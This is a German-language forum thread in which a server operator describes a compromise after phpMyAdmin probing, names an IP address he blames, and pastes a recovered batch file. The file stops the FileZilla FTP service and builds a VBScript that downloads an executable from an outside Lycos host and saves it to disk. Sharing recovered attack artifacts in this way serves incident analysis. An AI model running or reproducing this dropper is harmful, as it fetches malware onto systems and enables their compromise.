Ip aus den Logs : 81.209.165.125

Und nun geht mal auf : http://81.209.165.125:8080/

naaa was kommt ;)
 
Last edited by a moderator:
Hallo,

also ich kann mich auch täuschen, aber sämtlich Versuche eine PHPmyAdmin Schwachstelle zu finden endeten mit einem 404.

Und die IP, die du hier Anprangerst, hat in deinem Logauszug nicht einmal versucht PHPmyAdmin zufinden.

Das nur mal so am Rande.
 
Gucks dir doch genau an =)

es wurden einfach alle phpmyadmin versionen durchprobiert das amcht doch keiner zum spaß ;) bis er die richtige gefunden hat.

Lieder habe ich das phpmyadmin verzeichniss nicht mehr wo das vb script und die exen drin waren wäre wohl nocht stichhaltiger gewesen ;)

Nein aber auf die IP war der FTP verbunden der nach Installiert wurde.

Deswegen habe ich sie gepostet und weil da auch xampp läuft ;)
 
fw.bat --> Apache verzeichniss:

net stop "FileZilla Server FTP server" /y

vbs_/dateiendung vom antivirus geändert :

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >b.vbs
echo xPost.Open "GET","http://members.lycos.co.uk/chesyblat/l.exe",0 >>b.vbs
echo xPost.Send() >>b.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>b.vbs
echo sGet.Mode = 3 >>b.vbs
echo sGet.Type = 1 >>b.vbs
echo sGet.Open() >>b.vbs
echo sGet.Write(xPost.responseBody) >>b.vbs
echo sGet.SaveToFile "l.exe",2 >>b.vbs
cscript b.vbs

wenn ich mehr find hefte ichs dran

auf der lycos seite findet man viele Lustige dinge =)
 
warst du der pöse Clemens :p

ich werd mir jetzt zum spaß mal das ganze zeug von der lycos seite ziehen und in ner vm testen ;)
 
Ich meinte das eigendlich so, dass auf meinen Servern das 200-300x am Tag versucht wird. *g* nicht andersrum :p
 
You must log in or register to reply here.
Back
Top